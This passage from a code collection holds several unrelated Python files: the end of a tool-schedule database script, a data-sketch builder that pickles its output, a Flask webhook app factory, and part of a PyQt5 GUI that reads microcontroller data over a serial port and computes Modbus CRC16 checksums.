{}\n\nif __name__ == \"__main__\":\n print(\"Hello, World!\")\n f = ChangeToolScheduleDatabase()\n\n print(ChangeToolScheduleDatabase().readFromDB(\"Mohsen\"))","repo_name":"ebrahimabdelghfar/EwasteNonDestructiveDisassembly","sub_path":"src/CentralNode/src/storage/change_tool_database.py","file_name":"change_tool_database.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"39173727028","text":"import sketch\nimport sys\nimport os\nimport pickle\nimport myhash\n\ndef main():\n f = open(sys.argv[2])\n T = int(sys.argv[1])\n s = []\n mh = myhash.MyHash()\n for i in range(T):\n s.append(sketch.Sketch(i+1))\n\n i = 0\n 
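The while-loop below streams the input file, folds every length-(i+1) prefix of each line's 16-bit blocks into sketch i, and the script ends by pickling each sketch next to the input file. A compact stand-alone version of that read-update-pickle flow; Sketch and MyHash are project classes not shown here, so a plain dict keyed by prefix stands in for them, and the in-memory lines stand in for the file named in sys.argv[2]:

import pickle

lines = ["1 2 3", "1 2 4"]  # stand-in for the input file's contents
counts = {}                 # stand-in for the per-prefix-length Sketch objects
for line in lines:
    blocks = [int(w) for w in line.split()]
    for i in range(len(blocks)):
        key = (i, tuple(blocks[: i + 1]))     # length-(i+1) prefix, like changeVec16toU64
        counts[key] = counts.get(key, 0) + 1  # analogous to Sketch.insert(Si, 1)

with open("demo.sketch", "wb") as out:  # mirrors the '<file>.sketch.<i>' outputs above
    pickle.dump(counts, out)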
while True:\n        i += 1\n        if i % 100000 == 0:\n            print(str(i) + \" lines done\")\n        line = f.readline()\n        if line == '':\n            break\n        words = line.rstrip().split()\n        blocks = [int(w) for w in words]\n\n        # Use a separate loop variable here so the line counter i is not clobbered\n        for t in range(T):\n            Si = mh.changeVec16toU64(blocks[:t+1])\n            s[t].insert(Si, 1)\n\n    print(\"main sketch's numweights, sumweights, fi, F2\")\n\n    print(str(s[0].numweights) + \",\"\n          + str(s[0].sumweights) + \",\"\n          + str(12) + \": \" + str(s[0].fi(12)) + \",\"\n          + str(s[0].F2()))\n    print(\"---\")\n\n    for i in range(T):\n        output = open(sys.argv[2]+'.sketch.'+str(i+1), 'wb')\n        pickle.dump(s[i], output)\n        output.close()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"lavanyaj/random","sub_path":"secondsketcher.py","file_name":"secondsketcher.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"40684777949","text":"import os\nimport dotenv\nfrom flask import Flask\nfrom flask_cors import CORS\n\nfrom project.middleware.connect import Connect\nfrom project.middleware.authIdentifier import AuthIdentifier\n\nfrom project.flask.notifications import Notifications\nfrom project.flask.identifiers import Identifiers\n\ndotenv.load_dotenv()\ndebug_mode = os.getenv(\"DEBUG_MODE\") == \"1\"\n\n\ndef create_app(config_filename=None, instance_relative_config=True):\n    app = Flask(__name__)\n\n    if config_filename is not None:\n        app.config.from_pyfile(config_filename)\n\n    CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n    app.wsgi_app = AuthIdentifier(app.wsgi_app)\n    app.wsgi_app = Connect(app.wsgi_app)\n\n    app.add_url_rule(\n        \"/webhook\",\n        view_func=Notifications.webhook,\n        endpoint=\"notifications_webhook\",\n        methods=[\"POST\"],\n    )\n\n    app.add_url_rule(\n        \"/webhook\",\n        view_func=Notifications.get_webhook,\n        endpoint=\"notifications_webhook_get\",\n        methods=[\"GET\"],\n    )\n\n    app.add_url_rule(\n        \"/identifier\",\n        view_func=Identifiers.get_all,\n        endpoint=\"identifier_get_all\",\n        methods=[\"GET\"],\n    )\n\n    app.add_url_rule(\n        \"/identifier\",\n        view_func=Identifiers.create,\n        endpoint=\"identifier_create\",\n        methods=[\"POST\"],\n    )\n\n    return app\n","repo_name":"pnk-sh/octopus-webhook","sub_path":"project/flask/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"41494529816","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom PyQt5 import QtWidgets, QtCore, QtGui\r\nfrom PyQt5.QtWidgets import QFileDialog, QWhatsThis\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtWidgets import QCompleter\r\nfrom PyQt5.QtGui import QRegExpValidator\r\nimport pyqtgraph as pg\r\nimport numpy as np\r\nimport serial\r\nimport glob  # used by serial_ports() below\r\nimport os\r\nfrom time import gmtime, strftime\r\nimport time\r\nimport traceback\r\nfrom pyqtgraph.Qt import QtGui, QtCore\r\nfrom pyqtgraph.Point import Point\r\nimport socket\r\nimport sys\r\n#from requests import get\r\n#import bluetooth\r\nimport qdarkstyle\r\nimport array\r\n\r\n__version__ = '1.0.0'\r\n\r\nclass CommonWindow(QtWidgets.QWidget):\r\n\t\"\"\"Main application window class\"\"\"\r\n\tdef __init__(self, parent = None):\r\n\t\tQtWidgets.QWidget.__init__(self, parent)\r\n\r\n\t\tself.slave_address = 0x05\r\n\t\tself.slave_register = 0x10\r\n\t\tself.slave_register_address_hi = 
0x10\r\n\t\tself.slave_register_address_lo = 0x00\r\n\t\tself.slave_register_count_hi = 0x00\r\n\t\tself.slave_register_count_lo = 0x02\r\n\t\tself.slave_byte_count = 0x04\r\n\t\tself.slave_speed_hi = 0x00\r\n\t\tself.slave_speed_lo = 0x0a\r\n\t\tself.slave_dir_hi = 0x00\r\n\t\tself.slave_dir_lo = 0x09 \r\n\t\tself.slave_crc16_lo = 0x00\r\n\t\tself.slave_crc16_hi = 0x00\r\n\t\tself.data_array = [0]*13#length of packet\r\n\t\tself.data_bytearray = bytearray(self.data_array)\r\n\r\n\t\tself.serialDeviceConnected = False\r\n\t\tself.file_description = \"\"\r\n\t\tself.file_data_ch1 = np.empty(0)\r\n\t\tself.file_data_ch2 = np.empty(0)\r\n\t\tself.file_data_pressure = np.empty(0)\r\n\t\tself.file_data_microphone = np.empty(0)\r\n\t\tself.file_x_ax = np.empty(0)\r\n\t\tself.data = [0]#test data value for plot\r\n\t\tself.data_download_done = 0\r\n\t\tself.data_load_from_file_done = 0\r\n\t\tself.milk_data_from_file = np.empty((2,256))\r\n\t\tself.trace1 = np.zeros(256)\r\n\t\tself.trace2 = np.zeros(256)\r\n\t\t#self.trace1 = np.random.random(256)\r\n\t\t#self.trace2 = np.random.random(256)\r\n\t\tself.trace3 = np.zeros(256)\r\n\t\tself.x_ax = np.linspace(0, 1, 256)\r\n\r\n\t\tself.filter_data_out = 30\r\n\t\tself.filter_k = 0.99\r\n\t\tself.data_to_storage = list()\r\n\r\n\t\tself.fetch_enable = False\r\n\r\n\t\tself.first_load = 0\r\n\t\tself.previous_row = 0\r\n\t\tself.current_row = -1\r\n\t\tself.data_from_f4 = 0\r\n\t\tself.y_axio = list()\r\n\t\tself.count = 0\r\n\t\tself.last_clicked_plot = 0\r\n\t\t#pg.setConfigOption('background', 'd')\r\n\t\tpg.setConfigOption('foreground', 'g')\t\r\n\t\t#self.label_graph = pg.LabelItem(text = \"x and y\", color = \"CCFF00\")#justify='right'\r\n\t\tself.graph = pg.PlotWidget()\r\n\t\tself.graph_pressure = pg.PlotWidget()\r\n\t\tself.lastClicked = []\r\n\t\t#PlotCurveItem PlotWidget\r\n\t\tself.graph.showGrid(1,1,1)\r\n\t\tself.graph_pressure.showGrid(1,1,1)\r\n\t\tself.plot_xaxis = list()\r\n\t\tself.index = 0\r\n\t\tself.graph.setLabel('bottom', \"Time, sec\")\r\n\t\tself.graph_pressure.setLabel(\"bottom\", \"Time, sec\")\r\n\t\t#self.graph.setLabel('top', self.label_graph)\r\n\t\t#self.graph.showLabel(show = True)\r\n\t\tself.graph.setMinimumSize(500,200)\r\n\t\tself.graph_pressure.setMinimumSize(500, 200)\r\n\t\t\r\n\t\tself.vb = self.graph.plotItem.vb\r\n\r\n\t\tself.vLine = pg.InfiniteLine(angle=90, movable=False, pen = pg.mkPen('y', width = 1))\r\n\t\tself.hLine = pg.InfiniteLine(angle=0, movable=False, pen = pg.mkPen('y', width = 1))\r\n\t\tself.graph.addItem(self.vLine, ignoreBounds=True)\r\n\t\tself.graph.addItem(self.hLine, ignoreBounds=True)\r\n\t\t#self.graph.setRange(yRange = (0,4095))\r\n\t\t#self.graph_pressure.setRange(yRange = (0,100))\r\n\r\n\t\tself.curve = self.graph.plot(self.x_ax,self.trace1, pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\tself.curve = self.graph.plot(self.x_ax,self.trace2, pen = pg.mkPen('y', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\tself.curve_pressure = self.graph_pressure.plot(self.x_ax,self.trace3, pen = pg.mkPen('r', width = 3), symbol = 'o', symbolSize = 4)\r\n\r\n\t\tself.INITIAL_MODBUS = 0xFFFF\r\n\t\tself.INITIAL_DF1 = 0x0000\r\n\t\tself.table = (\r\n\t\t0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241,\r\n\t\t0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440,\r\n\t\t0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40,\r\n\t\t0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841,\r\n\t\t0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 
0xDBC1, 0xDA81, 0x1A40,\r\n\t\t0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41,\r\n\t\t0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641,\r\n\t\t0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040,\r\n\t\t0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,\r\n\t\t0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441,\r\n\t\t0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41,\r\n\t\t0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840,\r\n\t\t0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41,\r\n\t\t0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40,\r\n\t\t0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640,\r\n\t\t0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041,\r\n\t\t0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240,\r\n\t\t0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,\r\n\t\t0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41,\r\n\t\t0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840,\r\n\t\t0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41,\r\n\t\t0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40,\r\n\t\t0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640,\r\n\t\t0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041,\r\n\t\t0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241,\r\n\t\t0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440,\r\n\t\t0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,\r\n\t\t0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841,\r\n\t\t0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40,\r\n\t\t0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41,\r\n\t\t0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641,\r\n\t\t0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040 )\r\n\r\n\t\tself.ComPort = str\r\n\t\tself.comport_combo = QtWidgets.QComboBox()\r\n\t\tself.comport_combo.addItems([\"\"])\r\n\t\tself.comport_combo.addItems([\"Refresh\"])\r\n\t\tself.comport_combo.activated[str].connect(self.on_activated_com_list)\r\n\t\tself.comport_combo.activated[str].connect(self.ComPort)\r\n\r\n\t\tvertical_size = 30\r\n\t\thorizontal_size = 80\r\n\t\t\r\n\t\tself.onlyInt = QtGui.QIntValidator(1,5000)\r\n\t\t\r\n\t\tself.btn_cord_fixed = QtWidgets.QPushButton(\"&Capture\")\r\n\t\tself.btn_cord_fixed.setMaximumSize(120,60)\r\n\t\tself.btn_cord_fixed.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\r\n\t\tself.btn_load_file = QtWidgets.QPushButton(\"&Load File\")\r\n\t\tself.btn_load_file.setMaximumSize(80,60)\r\n\t\tself.btn_load_file.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\t\r\n\r\n\t\tself.label_visa_connect = QtWidgets.QLabel(\"COM port:\")\r\n\t\tself.label_visa_connect.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.label_visa_connect.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\t\tself.btn_visa_connect = QtWidgets.QPushButton(\"Connect\")\r\n\t\tself.btn_visa_connect.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.btn_visa_connect.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\t\tself.btn_visa_disconnect = 
QtWidgets.QPushButton(\"Disconnect\")\r\n\t\tself.btn_visa_disconnect.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.btn_visa_disconnect.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\t\r\n\t\tself.btn_visa_disconnect.setDisabled(True)\r\n\t\t\t\r\n\t\tself.data_fetch_timeout = QtWidgets.QLineEdit(\"001\")\r\n\t\tself.data_fetch_timeout.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.data_fetch_timeout.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\t\tself.data_fetch_timeout.setValidator(self.onlyInt)\r\n\t\tself.data_fetch_timeout.setAlignment(QtCore.Qt.AlignCenter)\r\n\r\n\t\tself.log_widget = QtWidgets.QPlainTextEdit()\r\n\t\tself.log_widget.insertPlainText(\"Log: \")\r\n\t\tself.log_widget.setReadOnly(True)\t\r\n\r\n\t\tself.description_widget = QtWidgets.QPlainTextEdit()\r\n\t\tself.description_widget.insertPlainText(\"File description: \")\r\n\t\tself.description_widget.setReadOnly(False)\t\t\t\t\r\n\r\n\t\tself.timeout_label = QtWidgets.QLabel(\"Timeout(ms):\")\r\n\t\tself.timeout_label.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.timeout_label.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\t\r\n\r\n\t\tself.btn_clear = QtWidgets.QPushButton(\"&Clear\")\r\n\t\tself.btn_clear.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.btn_clear.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\r\n\t\tself.btn_fetch = QtWidgets.QPushButton(\"&Fetch\")\r\n\t\tself.btn_fetch.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.btn_fetch.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\r\n\t\tself.btn_save = QtWidgets.QPushButton(\"&Save\")\r\n\t\tself.btn_save.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.btn_save.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\t\t\r\n\t\t\r\n\t\tself.grid = QtWidgets.QGridLayout()\r\n\t\tself.grid_2 = QtWidgets.QGridLayout()\r\n\t\tself.grid_plot_labels = QtWidgets.QGridLayout()\r\n\r\n\t\tself.grid.addWidget(self.label_visa_connect, 0, 0)\r\n\t\tself.grid.addWidget(self.comport_combo, 0, 1)\r\n\t\tself.grid.addWidget(self.btn_visa_connect, 0, 2)\r\n\t\tself.grid.addWidget(self.btn_visa_disconnect, 0, 3)\r\n\t\t\r\n\t\tself.grid.addWidget(self.timeout_label, 1, 3)\r\n\t\tself.grid.addWidget(self.btn_clear, 1, 2)\r\n\t\tself.grid.addWidget(self.btn_fetch,2,0)\r\n\t\t#self.grid.addWidget(self.btn_stop,2,1)\r\n\t\tself.grid.addWidget(self.btn_save,2,1)\r\n\t\tself.grid.addWidget(self.btn_load_file, 2,2)\r\n\t\tself.grid.addWidget(self.data_fetch_timeout, 2,3)\r\n\r\n\t\tself.grid.addWidget(self.description_widget, 3,0,4,5)\r\n\t\tself.grid.addWidget(self.log_widget, 8, 0, 7, 5)\r\n\r\n\t\tself.grid_plot_labels.addWidget(self.btn_cord_fixed, 0,0)\r\n\t\tself.grid_plot_labels.addWidget(QtWidgets.QLabel(\"\"),0,3)\r\n\t\tself.grid_plot_labels.addWidget(QtWidgets.QLabel(\"\"),0,5)\r\n\t\t#self.grid_plot_labels.insertStretch(0,4)\r\n\t\t\t\r\n\t\tself.grid.addWidget(QtWidgets.QLabel(\"\"),15,0)\r\n\t\tself.grid.addWidget(QtWidgets.QLabel(\"\"),15,1)\r\n\t\tself.grid.addWidget(QtWidgets.QLabel(\"\"),15,2)\r\n\t\tself.grid.addWidget(QtWidgets.QLabel(\"\"),15,3)\r\n\t\t\r\n\t\tself.grid_2.addWidget(QtWidgets.QLabel(\"\"),13,0)\r\n\t\tself.grid_2.addWidget(QtWidgets.QLabel(\"\"),13,1)\r\n\t\tself.grid_2.addWidget(QtWidgets.QLabel(\"\"),13,2)\r\n\t\tself.grid_2.addWidget(QtWidgets.QLabel(\"\"),13,3)\r\n\t\t\t\t\r\n\t\tself.vbox_1 = 
QtWidgets.QVBoxLayout()\r\n\t\tself.vbox_1.insertLayout(0,self.grid)\r\n\t\tself.vbox_1.insertLayout(1,self.grid_2)\r\n\t\t#self.vbox_1.insertLayout(2,self.grid_3)#table grid\r\n\t\t#self.vbox_1.addWidget(self.agm_readblock)\r\n\t\tself.vbox_1.insertStretch(3,0)\r\n\t\t#self.vbox_1.insertLayout(1,self.form)\r\n\t\t#self.setLayout(self.grid)\r\n\t\t\r\n\t\tself.hbox = QtWidgets.QHBoxLayout()\r\n\t\tself.vbox_graph_table = QtWidgets.QVBoxLayout()\r\n\r\n\t\t#self.vbox_graph_table.insertLayout(0,self.grid_plot_labels)\r\n\t\tself.vbox_graph_table.addWidget(self.graph)\r\n\t\tself.vbox_graph_table.addWidget(self.graph_pressure)\r\n\t\tself.vbox_graph_table.insertStretch(2,0)\r\n\t\t#self.hbox.addWidget(self.m)\r\n\t\tself.hbox.insertLayout(0,self.vbox_1)\r\n\t\tself.hbox.insertLayout(1,self.vbox_graph_table)\r\n\t\r\n\t\tself.hbox_2 = QtWidgets.QHBoxLayout()\r\n\r\n\t\tself.hbox_2.insertSpacing(0,335)\r\n\t\tself.hbox_2.insertStretch(2,0)\r\n\t\t#self.hbox_upper.addSpacing(200)\r\n\t\t\r\n\t\tself.vbox = QtWidgets.QVBoxLayout()\r\n\t\t#self.vbox.addWidget(self.label)\t\t\r\n\t\t#self.vbox.insertLayout(0,self.hbox1)\r\n\t\tself.vbox.insertLayout(0,self.hbox)\r\n\t\tself.vbox.insertLayout(1,self.hbox_2)\r\n\t\t#self.vbox.insertLayout(2,self.grid_3)\r\n\t\t#self.vbox.addWidget(self.table_of_records,1)\r\n\t\tself.setLayout(self.vbox)\r\n\r\n\t\tself.btn_fetch.setDisabled(True)\r\n\t\tself.btn_save.setDisabled(True)\r\n\r\n\t\tself.meas_thread = evThread()\r\n\t\t#self.meas_thread.start()\r\n\r\n\t\t#self.btn_visa_connect.clicked.connect(self.on_get_current_path)\r\n\t\t#self.btn_visa_connect.clicked.connect(self.meas_thread.on_connected)\r\n\t\tself.btn_visa_connect.clicked.connect(self.on_connected)\r\n\t\tself.btn_visa_disconnect.clicked.connect(self.on_disconnected)\r\n\t\tself.btn_save.clicked.connect(self.on_save_to_file)\r\n\t\tself.btn_load_file.clicked.connect(self.on_load_from_file) \r\n\t\tself.btn_fetch.clicked.connect(self.on_fetch_data)\r\n\t\tself.btn_clear.clicked.connect(self.on_clear_data)\r\n\t\t#self.comport_combo.activated.connect(self.meas_thread.on_activated_com_list)\r\n\r\n\t\t#self.meas_thread.started.connect(self.on_meas_started)\r\n\t\t#self.meas_thread.finished.connect(self.on_meas_completed)\r\n\t\t#self.meas_thread.status_signal.connect(self.on_status_text_change, QtCore.Qt.QueuedConnection)\r\n\t\t#self.meas_thread.dataplot.connect(self.data_from_f4, QtCore.Qt.QueuedConnection)\r\n\t\tself.meas_thread.dataplot.connect(self.on_data_received, QtCore.Qt.QueuedConnection)\r\n\t\tself.meas_thread.dataplot_array.connect(self.on_data_array_received, QtCore.Qt.QueuedConnection)\r\n\t\t#self.meas_thread.progress.connect(self.on_progress_go,QtCore.Qt.QueuedConnection)\r\n\t\t#self.proxy = pg.SignalProxy(self.graph.scene().sigMouseMoved, rateLimit=60, slot=self.mouseMoved)\r\n\t\t#self.curve.sigClicked.connect(self.clicked_point)\r\n\t\t#self.curve.sigPointsClicked.connect(self.clicked_point)\r\n\r\n\tdef on_clear_data(self):\r\n\t\tself.data_to_storage = list()\r\n\t\tself.y_axio = list()\r\n\t\tself.graph_pressure.clear()\r\n\t\tself.graph.clear()\r\n\t\tself.description_widget.clear()\r\n\t\tself.log_widget.clear()\r\n\r\n\r\n\tdef filter(self, data_input):\r\n\t\tdata_result = list()\r\n\t\tfor i in range(len(data_input)):\r\n\t\t\tself.filter_data_out = self.filter_data_out*self.filter_k + (1-self.filter_k)*data_input[i]\r\n\t\t\tdata_result.append(self.filter_data_out)\r\n\t\treturn data_result\r\n\r\n\tdef on_data_array_received(self, 
data_array):\r\n\t\tself.graph.clear()\r\n\t\ttemp_data = self.filter(data_array)\r\n\t\tself.y_axio += temp_data\r\n\t\tself.data_to_storage += temp_data\r\n\r\n\t\tif(len(self.y_axio)>2000):\r\n\t\t\tlength = len(self.y_axio)\r\n\t\t\tfp = length - 2000\r\n\t\t\tself.y_axio = self.y_axio[fp:length]\r\n\t\tx_axio = np.linspace(0,len(self.y_axio)-1, len(self.y_axio))\r\n\r\n\t\tdata_np = np.asarray(self.y_axio)\r\n\t\tmean_value = np.mean(data_np)\r\n\t\tself.curve1 = self.graph.plot(x_axio,self.y_axio, pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\tself.log_widget.appendPlainText(\"[{}] new data from mcu, total length {} mean {:4.2f}\".format(strftime(\"%H:%M:%S\"), len(self.data_to_storage), mean_value))\t\r\n\r\n\tdef on_data_received(self,data):\r\n\t\tself.graph.clear()\r\n\t\tself.y_axio.append(data)\r\n\t\tif(len(self.y_axio)>200):\r\n\t\t\tlength = len(self.y_axio)\r\n\t\t\tfp = length - 200\r\n\t\t\tself.y_axio = self.y_axio[fp:length]\r\n\t\tx_axio = np.linspace(0,len(self.y_axio)-1, len(self.y_axio))\r\n\t\tself.curve1 = self.graph.plot(x_axio,self.y_axio, pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\tself.log_widget.appendPlainText(\"[{}] new data from mcu\".format(strftime(\"%H:%M:%S\")))\r\n\r\n\tdef on_connected(self):\r\n\t\ttry:\r\n\t\t\t#self.ser = serial.Serial(self.ComPort, baudrate=921600, bytesize=serial.EIGHTBITS,\r\n\t\t\t#\t\t\t\t\t\t parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout = 0.1)\r\n\t\t\t#self.ser.isOpen() # try to open port\r\n\t\t\tself.btn_visa_connect.setDisabled(True)\r\n\t\t\tself.btn_visa_disconnect.setDisabled(False)\r\n\t\t\tself.btn_fetch.setDisabled(False)\r\n\t\t\tself.btn_save.setDisabled(False)\r\n\t\t\tself.serialDeviceConnected = True\r\n\t\t\tself.comport_combo.setEnabled(False)\r\n\t\t\tself.meas_thread.on_connected(self.ComPort)\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] Connected to {}\".format(strftime(\"%H:%M:%S\"), self.ComPort))\r\n\t\texcept IOError:\r\n\t\t\t#print(\"Port already open another programm\")\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] Port {} already open another programm\".format(strftime(\"%H:%M:%S\"), self.ComPort))\r\n\t\texcept serial.SerialException:\r\n\t\t\t#print(\"SerialException\")\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] SerialException\".format(strftime(\"%H:%M:%S\")))\r\n\t\texcept Exception:\r\n\t\t\t#print(\"Unexpected error, Null ComName\")\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] unexpected error\".format(strftime(\"%H:%M:%S\")))\r\n\tdef on_disconnected(self):\r\n\t\tself.btn_visa_connect.setDisabled(False)\r\n\t\tself.btn_visa_disconnect.setDisabled(True)\t\r\n\t\tself.btn_fetch.setDisabled(True)\r\n\t\tself.btn_save.setDisabled(True)\r\n\t\tself.serialDeviceConnected = False\r\n\t\tself.comport_combo.setEnabled(True)\r\n\t\tself.log_widget.appendPlainText(\"[{}] Disconnected\".format(strftime(\"%H:%M:%S\")))\r\n\t\ttry:\t\r\n\t\t\t#self.ser.close()\r\n\t\t\tself.meas_thread.on_disconnected()\r\n\t\t\tpass\r\n\t\texcept:\r\n\t\t\t#print(\"serial port close exception, on_disconnect --traceback\")\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] error, device session lost\".format(strftime(\"%H:%M:%S\")))\r\n\t\tprint(\"Disconnected\")\r\n\t\t\t\r\n\tdef on_activated_com_list(self, str):\r\n\t\tif self.comport_combo.currentText() == \"\" or self.serialDeviceConnected == True:\r\n\t\t\tself.btn_visa_connect.setDisabled(True)\r\n\t\telif self.comport_combo.currentText() == 
\"Refresh\":\r\n\t\t\tself.btn_visa_connect.setDisabled(True)\r\n\t\t\tself.comport_combo.clear()\r\n\t\t\tself.comport_combo.addItems([\"\"])\r\n\t\t\tself.comport_combo.addItems([\"Refresh\"])\r\n\t\t\tself.comport_combo.addItems(serial_ports())\r\n\t\telse:\r\n\t\t\tself.ComPort = str\r\n\t\t\tself.btn_visa_connect.setDisabled(False)\r\n\r\n\tdef on_fetch_data(self):\r\n\t\tif self.fetch_enable == True:\r\n\t\t\tself.fetch_enable = False\r\n\t\t\tself.meas_thread.running = False\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] fetch stop\".format(strftime(\"%H:%M:%S\")))\r\n\t\t\tself.graph_pressure.clear()\r\n\t\t\tx_axio = np.linspace(0,len(self.data_to_storage)-1, len(self.data_to_storage))\r\n\t\t\tself.curve1 = self.graph_pressure.plot(x_axio,self.data_to_storage, pen = pg.mkPen('w', width = 3), symbol = 'o', symbolSize = 6)\r\n\t\telse:\r\n\t\t\tself.fetch_enable = True\r\n\t\t\tself.meas_thread.running = True\r\n\t\t\tself.meas_thread.start()\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] fetch start\".format(strftime(\"%H:%M:%S\")))\r\n\r\n\tdef on_send_to_timer(self):\r\n\t\tt_data_array = [0]*9\r\n\t\tt_data_array[0] = self.slave_address\r\n\t\tt_data_array[1] = self.slave_register\r\n\t\tt_data_array[2] = 0x06\r\n\t\tt_data_array[3] = 0x7F\r\n\t\tt_data_array[4] = 0x00\r\n\t\tt_data_array[5] = 0x01\r\n\t\tt_data_array[6] = 0x02\r\n\t\tt_data_array[7] = 0x00\r\n\t\tt_data_array[8] = 0x0a\r\n\r\n\t\tt_bytearray = array.array('B', t_data_array).tobytes()\r\n\t\tprint(t_bytearray)\r\n\t\t#temp_crc_full = self.calcString( \"\\x05\\x10\\x10\\x00\\x00\\x01\\x02\\x00\\x0a\", self.INITIAL_MODBUS)\r\n\t\ttemp_crc_full = self.calcString( (t_bytearray), self.INITIAL_MODBUS)\r\n\t\tu16_crc16 = int(temp_crc_full)\r\n\t\tprint(temp_crc_full)\r\n\t\t#u16_crc_reverse = ((u16_crc16<<8)&0xff00) | ((u16_crc16>>8)&0xff)\r\n\t\tself.slave_crc16_lo = ((u16_crc16)&0xff)\r\n\t\tself.slave_crc16_hi = ((u16_crc16>>8)&0xff)\r\n\t\tprint(\"lo - {:02X} hi - {:02X}\".format(self.slave_crc16_lo, self.slave_crc16_hi))\r\n\t\tprint(\"lo - {} hi - {}\".format(self.slave_crc16_lo, self.slave_crc16_hi))\r\n\t\tself.data_array[0] = 